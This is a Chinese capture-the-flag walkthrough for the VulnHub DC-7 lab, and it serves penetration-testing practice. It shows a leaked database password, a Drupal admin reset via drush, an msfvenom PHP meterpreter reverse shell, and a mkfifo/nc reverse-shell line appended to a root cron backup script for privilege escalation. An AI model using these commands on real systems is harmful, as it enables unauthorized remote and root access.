VulnHub通关日记-DC_7-Walkthrough

简介: DC-7是另一个专门构建的易受攻击的实验室,目的是在渗透测试领域积累经验。

VulnHub通关日记-DC_7-Walkthrough

靶机介绍

DC-7是另一个专门构建的易受攻击的实验室,目的是在渗透测试领域积累经验。

尽管这不是一个过于技术性的挑战,但这并不容易。

虽然这是从早期DC版本开始的逻辑发展(我不会告诉您哪个),但是其中涉及一些新概念,但是您需要自己弄清楚这些概念。:-)如果您需要求助于暴力破解或字典攻击,您可能不会成功。

您需要做的是在盒子外面思考。

Waaaaaay在盒子外面。:-)

下载地址:https://www.vulnhub.com/entry/dc-7,356/

运用的知识

Github泄露网站数据库配置信息导致泄露SSHDrupal重置网站管理员密码 Drupal8-Getshell 第三方软件提权backups.sh

信息搜集

拿到靶机先扫了扫端口开放服务:


nmap -A -T4 192.168.1.146


图片1 nmap扫描


靶机开放了 22(ssh)、80(http)服务,其中 NMAP 检测出 http 使用的网站是 Drupal 8,我们先打开看看把:


图片2 网页内容


打开网站页面之后看到了一段提示信息:




Welcome to DC-7
DC-7 introduces some "new" concepts, but I'll leave you to figure out what they are.  :-)
While this challenge isn't all that technical, if you need to resort to brute forcing or a dictionary attacks, you probably won't succeed.
What you will have to do, is to think "outside" the box.
Way "outside" the box.  :-)


图片3 robots.txt文件



图片4 CHANGELOG.txt内容


网站上只有这一个信息,那么我还是去找找有关于这个 CMS 的漏洞把:


图片5 whatweb获取器版本信息

whatweb 得到的信息它的版本是 Drupal 8,我搜索了有关于这个版本的漏洞发现有这些:


图片6 关于这个版本的漏洞


我挨个去利用了相关的 POC ,可惜都没有利用成功!这个时候回过头来再仔细读了一遍网站的提示我发现了一个版权信息:


图片7 版权信息


既然作者提示我们说这个靶机的重点不在盒子里,是在盒子外面,而版权信息显示的是:DC7USER,那么会不会跟这个有关呢?

紧接着我抱着好奇心去 Google 搜索了 DC7USER


图片8 Google搜索DC7USER


搜索第一个是它的 Github,我打开看了看发现有一个项目:


image.png图片9 Dc7User的Github


点开后我找到了有关线索:




This is some "code" (yes, it's not the greatest code, but that wasn't the point) for the DC-7 challenge.
This isn't a flag, btw, but if you have made it here, well done anyway. :-)


image.png图片10 一些线索


这似乎是网站的源代码?于是我注意力放到了 ·config.php· 这个文件,打开看发现是一个数据库配置信息:




<?php    $servername = "localhost";    $username = "dc7user";    $password = "MdR3xOgB7#dW";    $dbname = "Staff";    $conn = mysqli_connect($servername, $username, $password, $dbname);?>


图片11 config.php


登陆SSH

我用得到的账号和密码尝试登陆网站发现登陆失败:


图片12 尝试利用得到的账号密码登录网站后台但是失败


随后我尝试登陆 SSH ,登陆成功!


image.png图片13 登录SSH成功


挺有意思的啊,这个 CTF 靶机超出了我的想象,有点像真正的渗透测试了,有那个味道了有木有!

随后我发现了一个 mbox 的文件,里面貌似是一封邮件信息:






From root@dc-7 Thu Aug 29 17:00:22 2019Return-path: <root@dc-7>Envelope-to: root@dc-7Delivery-date: Thu, 29 Aug 2019 17:00:22 +1000Received: from root by dc-7 with local (Exim 4.89)        (envelope-from <root@dc-7>)        id 1i3EPu-0000CV-5C        for root@dc-7; Thu, 29 Aug 2019 17:00:22 +1000From: root@dc-7 (Cron Daemon)To: root@dc-7Subject: Cron <root@dc-7> /opt/scripts/backups.shMIME-Version: 1.0Content-Type: text/plain; charset=UTF-8Content-Transfer-Encoding: 8bitX-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>X-Cron-Env: <SHELL=/bin/sh>X-Cron-Env: <HOME=/root>X-Cron-Env: <LOGNAME=root>Message-Id: <E1i3EPu-0000CV-5C@dc-7>Date: Thu, 29 Aug 2019 17:00:22 +1000
Database dump saved to /home/dc7user/backups/website.sql               [success]gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File existsgpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists
From root@dc-7 Thu Aug 29 17:15:11 2019Return-path: <root@dc-7>Envelope-to: root@dc-7Delivery-date: Thu, 29 Aug 2019 17:15:11 +1000Received: from root by dc-7 with local (Exim 4.89)        (envelope-from <root@dc-7>)        id 1i3EeF-0000Dx-G1        for root@dc-7; Thu, 29 Aug 2019 17:15:11 +1000From: root@dc-7 (Cron Daemon)To: root@dc-7Subject: Cron <root@dc-7> /opt/scripts/backups.shMIME-Version: 1.0Content-Type: text/plain; charset=UTF-8Content-Transfer-Encoding: 8bitX-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>X-Cron-Env: <SHELL=/bin/sh>X-Cron-Env: <HOME=/root>X-Cron-Env: <LOGNAME=root>Message-Id: <E1i3EeF-0000Dx-G1@dc-7>Date: Thu, 29 Aug 2019 17:15:11 +1000
Database dump saved to /home/dc7user/backups/website.sql               [success]gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File existsgpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists
From root@dc-7 Thu Aug 29 17:30:11 2019Return-path: <root@dc-7>Envelope-to: root@dc-7Delivery-date: Thu, 29 Aug 2019 17:30:11 +1000Received: from root by dc-7 with local (Exim 4.89)        (envelope-from <root@dc-7>)        id 1i3Esl-0000Ec-JQ        for root@dc-7; Thu, 29 Aug 2019 17:30:11 +1000From: root@dc-7 (Cron Daemon)To: root@dc-7Subject: Cron <root@dc-7> /opt/scripts/backups.shMIME-Version: 1.0Content-Type: text/plain; charset=UTF-8Content-Transfer-Encoding: 8bitX-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>X-Cron-Env: <SHELL=/bin/sh>X-Cron-Env: <HOME=/root>X-Cron-Env: <LOGNAME=root>Message-Id: <E1i3Esl-0000Ec-JQ@dc-7>Date: Thu, 29 Aug 2019 17:30:11 +1000
Database dump saved to /home/dc7user/backups/website.sql               [success]gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File existsgpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists
From root@dc-7 Thu Aug 29 17:45:11 2019Return-path: <root@dc-7>Envelope-to: root@dc-7Delivery-date: Thu, 29 Aug 2019 17:45:11 +1000Received: from root by dc-7 with local (Exim 4.89)        (envelope-from <root@dc-7>)        id 1i3F7H-0000G3-Nb        for root@dc-7; Thu, 29 Aug 2019 17:45:11 +1000From: root@dc-7 (Cron Daemon)To: root@dc-7Subject: Cron <root@dc-7> /opt/scripts/backups.shMIME-Version: 1.0Content-Type: text/plain; charset=UTF-8Content-Transfer-Encoding: 8bitX-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>X-Cron-Env: <SHELL=/bin/sh>X-Cron-Env: <HOME=/root>X-Cron-Env: <LOGNAME=root>Message-Id: <E1i3F7H-0000G3-Nb@dc-7>Date: Thu, 29 Aug 2019 17:45:11 +1000
Database dump saved to /home/dc7user/backups/website.sql               [success]gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File existsgpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists
From root@dc-7 Thu Aug 29 20:45:21 2019Return-path: <root@dc-7>Envelope-to: root@dc-7Delivery-date: Thu, 29 Aug 2019 20:45:21 +1000Received: from root by dc-7 with local (Exim 4.89)        (envelope-from <root@dc-7>)        id 1i3Hvd-0000ED-CP        for root@dc-7; Thu, 29 Aug 2019 20:45:21 +1000From: root@dc-7 (Cron Daemon)To: root@dc-7Subject: Cron <root@dc-7> /opt/scripts/backups.shMIME-Version: 1.0Content-Type: text/plain; charset=UTF-8Content-Transfer-Encoding: 8bitX-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>X-Cron-Env: <SHELL=/bin/sh>X-Cron-Env: <HOME=/root>X-Cron-Env: <LOGNAME=root>Message-Id: <E1i3Hvd-0000ED-CP@dc-7>Date: Thu, 29 Aug 2019 20:45:21 +1000
Database dump saved to /home/dc7user/backups/website.sql               [success]gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File existsgpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists
From root@dc-7 Thu Aug 29 22:45:17 2019Return-path: <root@dc-7>Envelope-to: root@dc-7Delivery-date: Thu, 29 Aug 2019 22:45:17 +1000Received: from root by dc-7 with local (Exim 4.89)        (envelope-from <root@dc-7>)        id 1i3Jng-0000Iw-Rq        for root@dc-7; Thu, 29 Aug 2019 22:45:16 +1000From: root@dc-7 (Cron Daemon)To: root@dc-7Subject: Cron <root@dc-7> /opt/scripts/backups.shMIME-Version: 1.0Content-Type: text/plain; charset=UTF-8Content-Transfer-Encoding: 8bitX-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>X-Cron-Env: <SHELL=/bin/sh>X-Cron-Env: <HOME=/root>X-Cron-Env: <LOGNAME=root>Message-Id: <E1i3Jng-0000Iw-Rq@dc-7>Date: Thu, 29 Aug 2019 22:45:16 +1000
Database dump saved to /home/dc7user/backups/website.sql               [success]
From root@dc-7 Thu Aug 29 23:00:12 2019Return-path: <root@dc-7>Envelope-to: root@dc-7Delivery-date: Thu, 29 Aug 2019 23:00:12 +1000Received: from root by dc-7 with local (Exim 4.89)        (envelope-from <root@dc-7>)        id 1i3K28-0000Ll-11        for root@dc-7; Thu, 29 Aug 2019 23:00:12 +1000From: root@dc-7 (Cron Daemon)To: root@dc-7Subject: Cron <root@dc-7> /opt/scripts/backups.shMIME-Version: 1.0Content-Type: text/plain; charset=UTF-8Content-Transfer-Encoding: 8bitX-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>X-Cron-Env: <SHELL=/bin/sh>X-Cron-Env: <HOME=/root>X-Cron-Env: <LOGNAME=root>Message-Id: <E1i3K28-0000Ll-11@dc-7>Date: Thu, 29 Aug 2019 23:00:12 +1000
Database dump saved to /home/dc7user/backups/website.sql               [success]
From root@dc-7 Fri Aug 30 00:15:18 2019Return-path: <root@dc-7>Envelope-to: root@dc-7Delivery-date: Fri, 30 Aug 2019 00:15:18 +1000Received: from root by dc-7 with local (Exim 4.89)        (envelope-from <root@dc-7>)        id 1i3LCo-0000Eb-02        for root@dc-7; Fri, 30 Aug 2019 00:15:18 +1000From: root@dc-7 (Cron Daemon)To: root@dc-7Subject: Cron <root@dc-7> /opt/scripts/backups.shMIME-Version: 1.0Content-Type: text/plain; charset=UTF-8Content-Transfer-Encoding: 8bitX-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>X-Cron-Env: <SHELL=/bin/sh>X-Cron-Env: <HOME=/root>X-Cron-Env: <LOGNAME=root>Message-Id: <E1i3LCo-0000Eb-02@dc-7>Date: Fri, 30 Aug 2019 00:15:18 +1000
rm: cannot remove '/home/dc7user/backups/*': No such file or directoryDatabase dump saved to /home/dc7user/backups/website.sql               [success]
From root@dc-7 Fri Aug 30 03:15:17 2019Return-path: <root@dc-7>Envelope-to: root@dc-7Delivery-date: Fri, 30 Aug 2019 03:15:17 +1000Received: from root by dc-7 with local (Exim 4.89)        (envelope-from <root@dc-7>)        id 1i3O0y-0000Ed-To        for root@dc-7; Fri, 30 Aug 2019 03:15:17 +1000From: root@dc-7 (Cron Daemon)To: root@dc-7Subject: Cron <root@dc-7> /opt/scripts/backups.shMIME-Version: 1.0Content-Type: text/plain; charset=UTF-8Content-Transfer-Encoding: 8bitX-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>X-Cron-Env: <SHELL=/bin/sh>X-Cron-Env: <HOME=/root>X-Cron-Env: <LOGNAME=root>Message-Id: <E1i3O0y-0000Ed-To@dc-7>Date: Fri, 30 Aug 2019 03:15:17 +1000
rm: cannot remove '/home/dc7user/backups/*': No such file or directoryDatabase dump saved to /home/dc7user/backups/website.sql               [success]


image.png图片14 mbox里的内容


仔细看了一看发现它是一个定时脚本:/opt/script/backups.sh

ls 查看了一下,发现它只能 root 用户和 www-data 修改它,查看了脚本后好像删除了一些文件还有解压文件等等:




#!/bin/bash
rm /home/dc7user/backups/*
cd /var/www/html/
drush sql-dump --result-file=/home/dc7user/backups/website.sql
cd ..
tar -czf /home/dc7user/backups/website.tar.gz html/
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.sql
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.tar.gz
chown dc7user:dc7user /home/dc7user/backups/*
rm /home/dc7user/backups/website.sql
rm /home/dc7user/backups/website.tar.gz


图片15 backup.sh内容


Drupal重置网站管理员密码

其中的 drush 我并不知道是什么命令,紧接着我去搜索了一波发现它是一个简化了创建和管理Drupal8网站的命令行工具。

相关文章:https://drupalchina.gitbooks.io/begining-drupal8-cn/content/chapters/chapter-15.html

看文档得知 sql-dump是使用mysqldump或等效的操作导出Drupal数据库为SQL的命令!


image.png图片16 SQL命令


由于这个脚本上到处数据库所在的目录是 /var/www/html,那么我们也切换到这个目录,随后我用 drush 的命令重置了网站后台的密码:


drush user-password admin --password="pass"


image.png图片17 重置admin账号密码


重置完后拿到账号 admin 密码 pass 登陆到了网站后台:


image.png图片18 利用重置完的账号去登陆网站后台


Drupal-Getshell

登陆到后台之后,我是 Google 上找到了getshell的方法,先是从 https://www.drupal.org/project/php 下载它的模块:


图片19 下载模块


下载完后来到 Extend - Install new module 上传到网站:


图片20 Extend-install new module



图片21 上传



image.png图片22 上传成功


然后启用 PHP Filter 模块:


image.png图片23 启动php filter模块


启用之后在Content 中添加我们的脚本木马,添加脚本木马前先用 MSF 生成一个 PHP 的木马:


msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.128 LPORT=7777 -f raw


图片24 msf生成php木马


紧接着打开 MSF 设置参数开启监听:


图片25 msf开启监听


最后添加我们的脚本代码到页面中:


图片26 添加脚本到代码页面1



image.png图片27 添加脚本到代码页面2


(PS:如果失败了那么先设置为 PHP code,再把脚本代码放进去保存就可以了)

设置好之后成功反弹得到一枚 shell


image.png图片28 获得反弹的shell


得到shell之后用MSF自带的模块查看有没有可以提权的模块,但是发现没有可利用提权的地方:


image.png图片29 利用msf查找是否存在可以提权的地方


先让它切换到 shell 环境把:



shellpython -c 'import pty;pty.spawn("/bin/bash")'


图片30 切换到shell环境


利用backups.sh文件提权

随后我们来到了 /opt/scripts 目录下,因为之前我们知道了 backups.sh 它只能 root 用户和 www-data 用户权限去修改它:


图片31 修改Backup.sh权限


所以我们就可以利用这段代码来反弹一个 shellKALI,反弹回来的shell自然就是root权限!

先是我们在 KALI nc 监听 8888 ,然后输入这段代码:


echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.128 8888 >/tmp/f" >> backups.sh


图片32 反弹shell


这个时候就成功获取到 root 权限,拿到 FLAG


图片33 获取root权限,拿到flag


相关链接:

VulnHub通关日记-DC_1-Walkthrough

VulnHub通关日记-DC_2-Walkthrough

VulnHub通关日记-DC_3-Walkthrough

VulnHub通关日记-DC_4-Walkthrough

VulnHub通关日记-DC_5-Walkthrough

VulnHub通关日记-DC_6-Walkthrough

相关文章
|
SQL 安全 网络协议
VulnHub通关日记-DC_9-Walkthrough
DC-9是 DC 系列的最后一个靶机了,这项挑战的最终目标是扎根并读取唯一的标志。
|
Shell 网络安全 数据安全/隐私保护
VulnHub通关日记-DC_6-Walkthrough
好的,这并不是一个真正的线索,但是对于那些只是想继续工作的人,更多的是“我们不想花五年时间等待某个过程完成”的建议。
|
安全 Shell C语言
VulnHub通关日记-DC_5-Walkthrough
LFI(本地文件包含)日志获取shell wfuzz工具的使用 screen提权root
|
SQL Shell 网络安全
VulnHub通关日记-DC_4-Walkthrough
DC-4是另一个专门构建的易受攻击的实验室,目的是在渗透测试领域积累经验。
|
Shell Linux 网络安全
VulnHub通关日记-DC_2-Walkthrough
总共有5个Flag,最后一个Flag是在 root 目录下!
|
SQL 安全 关系型数据库
VulnHub通关日记-DC_1-Walkthrough
DC系列的靶机是一个专门构建的易受攻击的实验室,总共有九个!目的是获得渗透测试领域的经验
|
6月前
BOSHIDA DC/AC电源模块的节能特点与环保优势
BOSHIDA DC/AC电源模块的节能特点与环保优势
BOSHIDA DC/AC电源模块的节能特点与环保优势
|
6月前
|
安全
DC/AC电源模块为现代电子设备提供稳定的能源
DC/AC电源模块为现代电子设备提供稳定的能源
 DC/AC电源模块为现代电子设备提供稳定的能源
|
6月前
|
安全
DC/AC电源模块:让电力转换变得更简单
DC/AC电源模块:让电力转换变得更简单
DC/AC电源模块:让电力转换变得更简单
|
4月前
|
芯片 网络架构
开关电源DC-DC电源应用
DC-DC指直流转直流电源(Direct Current)。是一种在直流电路中将一个电压值的电能变为另一个电压值的电能的装置。如,通过一个转换器能将一个直流电压(5.0V)转换成其他的直流电压(1.5V或12.0V),我们称这个转换器为DC-DC转换器,或称之为开关电源或开关调整器。 DC-DC转换器一般由控制芯片,电感线圈,二极管,三极管,电容器构成。在讨论DC-DC转换器的性能时,如果单针对控制芯片,是不能判断其优劣的。其外围电路的元器件特性,和基板的布线方式等,能改变电源电路的性能,因此,应进行综合判断。 DC-DC转换器的使用有利于简化电源电路设计,缩短研制周期,实现最佳指标等,被